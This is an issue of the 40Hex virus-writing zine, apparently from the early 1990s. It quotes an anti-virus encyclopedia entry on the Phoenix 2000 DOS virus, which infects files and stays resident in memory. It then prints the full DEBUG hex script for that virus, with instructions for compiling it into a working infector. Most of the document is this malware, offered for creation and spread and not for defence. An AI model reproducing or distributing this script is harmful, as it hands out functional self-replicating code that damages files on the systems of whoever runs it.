40Hex Number 9 Volume 2 Issue 5 File 003 Below is the debug script for the Phoenix 2000 virus. Let's see what Patti Hoffman's VSUM has to say about it: Phoenix 2000 Virus Name: Phoenix 2000 Aliases: V Status: Rare Discovered: December, 1991 Symptoms: .COM file growth; .EXE files altered; TSR; decrease in total system and available free memory Origin: Bulgaria Eff Length: 2,000 Bytes Type Code: PRshAK - Parasitic Resident .COM & .EXE Infector Detection Method: ViruScan, AVTK 5.54+, UTScan 22.00+ Removal Instructions: Delete infected files General Comments: The Phoenix 2000 virus was received from The Netherlands in December, 1991, where it was uploaded to several BBSes by a person identifying themself as "Dark Avenger". This virus originated in Bulgaria, and is closely related to the earlier V82 virus. Phoenix 2000 is a memory resident infector of .COM and .EXE files, as well as COMMAND.COM. The first time a program infected with Phoenix 2000 is executed, the Phoenix 2000 virus will become memory resident at the top of system memory but below the 640K DOS boundary. It will also install a small TSR in low system memory of 112 bytes. The virus at the top of system memory is 8,192 bytes in size, this is the amount total system memory as indicated by the DOS CHKDSK program will decrease by. The decrease in available free memory will be slightly more. The Phoenix 2000 virus hooks interrupt 2A. Interrupt 12's return will not have been moved. Once Phoenix 2000 is memory resident, it will infect .COM and .EXE programs, including COMMAND.COM, when they are opened, executed, copied, or accessed in any way. While it will always infect .COM files, .EXE files are only successfully infected if they contain 2,000 bytes of binary 00 characters in a continuous block. If the 2,000 bytes of binary 00 characters do not exist, the file may be partially infected, but will not be replicating copy of the virus. .COM programs, other than COMMAND.COM, will have a file length increase of 2,000 bytes with the virus being located in the middle or end of the infected file. Phoenix 2000 is unable to identify previous infections of itself on infected .COM files, so they may become reinfected by Phoenix 2000, adding an additional 2,000 bytes to the file for each reinfection. There will be no change to the file's date and time in the DOS disk directory listing. COMMAND.COM and .EXE files will not have a file length increase when they are infected with the Phoenix 2000 virus. In these two cases, the virus will overwrite 2,000 bytes of binary 00 characters within the file with the virus code. For .EXE files with less than 2,000 bytes of binary 00 characters, the file will be partially infected and may not function properly as a result. To create the virus, simply copy the script below to a file called "Phoenix.lst" and type: debug < phoenix.lst > nul Dark Angel ------------------------------------------------------------------------------- n phoenix.com e 0100 E8 00 00 5E 95 B9 D6 03 51 8B FE 33 D2 2E 33 54 e 0110 1F 46 46 49 79 F7 58 2E 31 55 1F 47 47 48 79 F7 e 0120 87 C9 87 F6 87 D2 FA 81 C6 4F F8 1E E8 86 01 8E e 0130 C7 4F 26 3B 5D 78 74 0F 80 6D 02 02 1F 1E 80 EF e 0140 02 3B 1D 73 02 89 1D 83 C7 76 B8 D5 06 AB 8B C3 e 0150 AB 06 1F B9 00 20 B0 2E F2 AE 81 3D FF 1E 75 F8 e 0160 8B 7D 02 81 C7 D0 06 B8 59 07 AB 93 AB FF 75 FA e 0170 FF 75 F8 0E 1F 8B DE 8A FB 03 9C 57 01 56 8E C0 e 0180 33 FF B9 22 00 8B C6 3A C3 74 02 3A C7 AC 74 01 e 0190 AA E2 F2 AF B9 D9 03 F3 A5 5E 58 AB 58 AB 92 48 e 01A0 AB 51 B2 80 B4 08 9C 26 FF 5D FA 58 AA 72 0C 80 e 01B0 FA 02 73 05 80 FE 04 72 02 B4 FE AB 07 FB 56 81 e 01C0 C6 4A 01 B9 E8 03 EB 49 E8 EA 00 8E DF 3B 5D 77 e 01D0 74 2D BF 4C 00 C4 5D D0 B4 13 CD 2F 06 B0 F5 E6 e 01E0 60 33 C0 E6 61 8E C0 93 AB 58 AB BA 80 00 B9 01 e 01F0 00 B8 11 03 CD 13 FE C5 75 F7 80 C1 40 EB F2 95 e 0200 E8 00 00 5E 83 C6 C5 56 0E 1F 81 C6 82 00 B9 80 e 0210 00 BF FD 00 8C DA 01 54 0B 3B 54 0B 75 3B A5 A4 e 0220 A5 A5 5F AD 8B DE 8B F0 06 1F 2E FF 2F F3 A5 96 e 0230 8B F9 C6 05 4D 89 55 03 42 26 29 55 03 B4 50 CD e 0240 21 0E 1F 8E C3 8D 5C 09 EB DE F3 AA 95 00 00 00 e 0250 00 C3 C3 FD 00 00 00 21 20 03 54 07 8B 4C 03 56 e 0260 8B 74 05 E3 0C AD 93 AD 03 C2 8E C0 26 01 17 E2 e 0270 F4 8E C2 AD 91 E3 07 AD 93 26 01 17 E2 F9 8C C0 e 0280 80 C4 10 8E C0 33 C2 75 EA 5E B1 11 8C DB 2B D3 e 0290 2B D9 8E DB 8B FA 2B F9 B1 04 D3 E7 83 EF 0F 43 e 02A0 3B F7 73 9D 4A 03 DA 8E C3 43 96 89 5C 01 8B FE e 02B0 B1 88 E9 78 FF FC BF 03 00 8C DB 4B 8E DB 43 03 e 02C0 1D 80 7D FD 5A 75 F5 C3 72 FD 50 B8 20 12 CD 2F e 02D0 72 0A 53 26 8A 1D B8 16 12 CD 2F 5B 5E 72 E8 06 e 02E0 1F C6 45 02 02 FF 75 05 33 C0 87 45 17 50 33 C0 e 02F0 87 45 15 50 56 BA 03 04 B1 80 84 75 04 75 39 80 e 0300 FD 3E 75 05 BA 02 00 B1 C0 22 4D 05 75 2B 2E 89 e 0310 16 DD 07 8B 45 28 3D 45 58 74 13 3D 43 4F 75 13 e 0320 3B 45 20 B8 4D 4D 75 06 3B 45 22 75 01 41 3A 45 e 0330 2A 74 09 80 FD 4B 74 04 F9 E9 A8 02 51 0E 1F BA e 0340 C5 17 B9 1A 00 B4 3F CD 21 33 C8 F9 75 4D 8B F2 e 0350 AD 3D 4D 5A 74 4A 3D 5A 4D 74 45 26 3B 4D 13 F9 e 0360 75 39 A3 4D 01 AD A3 4F 01 26 8B 45 11 2D 10 08 e 0370 72 29 26 89 45 15 50 E8 A4 02 72 1D 8B F2 8B 04 e 0380 A3 51 01 B5 AB 88 2E 4B 01 32 C4 75 0C 50 E8 7C e 0390 02 58 72 05 AC 32 C4 E1 FB 91 5A 59 72 9B 74 2A e 03A0 74 42 84 C9 75 92 33 F6 3D D2 06 72 1D 26 8A 45 e 03B0 12 F6 D0 A8 38 74 81 58 50 86 C4 33 D2 26 8B 75 e 03C0 11 83 EE 03 F7 F6 83 C2 03 49 51 26 89 55 15 8B e 03D0 C2 2D 03 00 C6 06 C5 17 E9 A3 C6 17 B9 FD 00 33 e 03E0 C0 E9 18 01 8B 44 16 26 89 45 15 B1 04 E8 30 02 e 03F0 72 A9 D1 E8 87 44 06 48 48 A3 51 01 01 44 0C 01 e 0400 44 14 40 40 B1 10 3A E1 F5 72 90 F7 E1 87 54 04 e 0410 8B CA D1 E2 D1 E2 03 54 16 2B C2 72 EC 83 7C 0A e 0420 00 74 0F 50 2D F2 07 73 17 D1 E0 03 D0 72 11 2B e 0430 D0 58 2D 22 01 73 06 D1 E0 03 D0 73 CB 33 C0 50 e 0440 8B 44 16 2B D0 5E 72 C1 56 80 E2 FC 03 D0 26 89 e 0450 55 15 2B D0 D1 EA D1 EA BE E5 07 56 2D 20 00 73 e 0460 0A 83 EE 04 05 04 00 4A 79 01 42 89 16 4D 01 2B e 0470 CA 73 02 33 C9 A3 4F 01 5A 51 D1 E1 D1 E1 75 09 e 0480 3B F2 74 05 26 80 45 15 04 B4 3F CD 21 59 72 56 e 0490 26 29 45 15 57 53 BF DF 17 32 D2 51 56 57 AF 57 e 04A0 E3 23 AD 8B F8 AD D1 C0 D1 C0 D1 C0 D1 C0 8B D8 e 04B0 80 E3 F0 03 DF 14 00 24 0F 3A C2 75 06 5F 89 1D e 04C0 47 47 57 E2 DD 58 5B 5E 59 8B F8 2B C3 D1 E8 48 e 04D0 89 07 42 80 FA 10 75 C3 5B 5F BA DF 17 D1 E1 83 e 04E0 C1 20 B4 40 CD 21 5E 59 72 7E 51 26 8B 4D 15 83 e 04F0 E9 20 33 C0 87 0E D9 17 87 06 DB 17 89 0E 53 01 e 0500 A3 55 01 59 58 41 56 52 51 53 33 D2 B9 90 00 F7 e 0510 F1 E8 40 01 A3 14 00 E8 3A 01 A3 1E 00 92 B2 06 e 0520 F6 F2 BE E1 07 E8 00 01 BB D8 05 E8 06 01 BB E0 e 0530 07 BE AC 05 B9 26 00 AC 24 3F 74 1F 50 24 07 D7 e 0540 B4 F8 92 58 51 B1 03 D2 E8 74 07 D7 D2 E0 0A D0 e 0550 B6 C0 59 20 B4 53 FA 08 94 53 FA E2 DA 91 5B 59 e 0560 5E 84 C9 75 26 E8 A5 00 72 77 91 26 03 45 11 2B e 0570 C1 26 89 45 15 FE C4 A3 51 01 C6 06 4B 01 A5 B4 e 0580 40 CD 21 33 C1 75 5A 26 89 75 15 06 57 99 A3 57 e 0590 01 96 EC 24 1F 91 EC 24 1F 1E 07 BF E1 07 F6 84 e 05A0 AC 05 80 74 04 E8 B6 00 91 A4 81 FE 20 00 75 EE e 05B0 E8 AB 00 AD B9 D7 03 AD 33 06 D8 07 33 D0 AB E2 e 05C0 F6 33 54 08 31 55 E0 5F 07 5E 56 B4 40 E8 3F 00 e 05D0 33 C8 75 0D 26 89 4D 15 BA C5 17 B1 18 B4 40 CD e 05E0 21 B5 3E F9 58 06 1F 8F 45 15 8F 45 17 73 11 8A e 05F0 45 0D F6 D0 A8 1F 74 08 80 4D 0D 1F 80 65 05 BF e 0600 58 0A C4 24 40 08 45 06 B4 3E CD 21 C3 B4 3F B9 e 0610 00 01 BA C8 00 85 F6 74 0C B9 D0 07 EB 04 B1 02 e 0620 B4 3F BA E1 07 CD 21 C3 BB D2 05 E8 08 00 88 04 e 0630 46 BB D5 05 8A C4 D0 E8 8A D0 50 14 01 3C 03 72 e 0640 02 2C 03 0A D0 D7 88 04 46 58 D7 88 04 46 8A C2 e 0650 34 03 D7 C3 D1 EA B8 79 F7 73 02 0C 04 C3 E8 01 e 0660 00 91 98 3C 02 73 02 B0 02 3B F0 76 3E 8D 45 1F e 0670 8A 26 57 01 A3 57 01 48 3A C4 B0 90 AA 75 14 EC e 0680 24 1F 3C 08 73 0D B4 09 F6 E4 04 C0 8A E0 B0 87 e 0690 89 45 FE 8B C6 53 B3 15 2C 11 3C 05 72 08 B3 1F e 06A0 2C 0A 3C 05 73 02 FE 0F 5B B0 20 C3 00 00 00 84 e 06B0 80 82 00 00 82 80 2C 80 09 80 00 0E 00 84 84 82 e 06C0 80 00 83 80 00 0F 00 85 85 83 80 00 00 00 00 04 e 06D0 00 01 00 01 02 03 06 07 07 04 05 9C FA 50 53 51 e 06E0 52 56 57 1E 06 FC 0E 07 91 80 FD 3E 74 0F 8B F2 e 06F0 BF DF 17 B4 60 CD 21 B8 00 3D CD 21 93 BA 00 00 e 0700 8E DA BF D0 07 BE 4C 00 B8 B3 07 87 04 AB 50 8C e 0710 C0 87 44 02 AB 50 B8 38 07 87 44 44 50 8C C0 87 e 0720 44 46 50 1E 56 A1 6C 04 50 E8 9C FB 0E 1F BE DF e 0730 17 8B FE 80 FD 4B 74 0C 54 58 80 FD 3E F9 74 75 e 0740 3B C4 72 71 AC 3C 5C 75 02 8B FE 84 C0 75 F5 B8 e 0750 2A 2E 89 05 98 89 45 02 B4 2F CD 21 06 53 BA E1 e 0760 07 B4 1A CD 21 0E 07 B9 23 00 BA DF 17 B4 4E CD e 0770 21 72 30 A0 F7 07 F6 D0 A8 1F 74 21 BE FF 07 57 e 0780 AC AA 84 C0 75 FA 5F 8B 44 FD 3D 58 45 74 07 3D e 0790 4F 4D 75 09 B4 43 B0 2E 3B 44 FB 74 06 B4 4F CD e 07A0 21 73 D0 5A 1F B4 1A CD 21 72 0A 0E 1F BA DF 17 e 07B0 B8 00 3D CD 21 5B 93 E8 0E FB 5E 1F 8F 44 46 8F e 07C0 44 44 8F 44 02 8F 04 07 1F 5F 5E 5A 59 5B 58 9D e 07D0 EA 00 00 00 00 56 57 55 1E 06 8B EC 80 FC 82 75 e 07E0 52 8C D8 3B 46 0C 75 4B B8 18 12 CD 2F 8C C8 3B e 07F0 44 14 74 3F AD 80 EC 3D 74 1F FE CC 74 19 2D 00 e 0800 0D 75 30 C4 7C 10 26 81 7D FE CD 21 75 25 40 2E e 0810 30 06 B2 07 75 1D F9 B3 30 0E 07 BF D1 06 B8 DB e 0820 05 87 44 10 73 02 48 48 AB 8C C8 87 44 12 AB 80 e 0830 64 14 FE 07 1F 5D 5F 5E B0 03 CF 58 80 EC 02 80 e 0840 FC 02 73 0C FF 45 01 75 07 B8 01 03 9C FF 5D FA e 0850 58 D1 E8 73 53 B4 01 EB 51 1E 57 0E 1F BF DA 07 e 0860 80 3D 00 74 0D 41 75 09 32 E4 86 25 F9 8B 4D 05 e 0870 41 49 9C 50 9C FF 5D FA 73 C1 1F 1F EB 2C 88 25 e 0880 89 4D 05 3A 65 03 75 03 80 F4 01 51 B9 FF FF 9C e 0890 FF 5D F6 59 9C 50 32 C0 86 05 A8 02 75 FE 58 9D e 08A0 73 08 80 FC 01 F9 75 02 33 C0 5F 1F FB CA 02 00 e 08B0 98 34 00 1E 57 0E 1F BF DA 07 3A 65 04 74 E9 84 e 08C0 E4 74 E5 80 FC 01 74 05 80 FC 05 72 B1 5F 1F EA rcx 07D0 w q ------------------------------------------------------------------------------- DA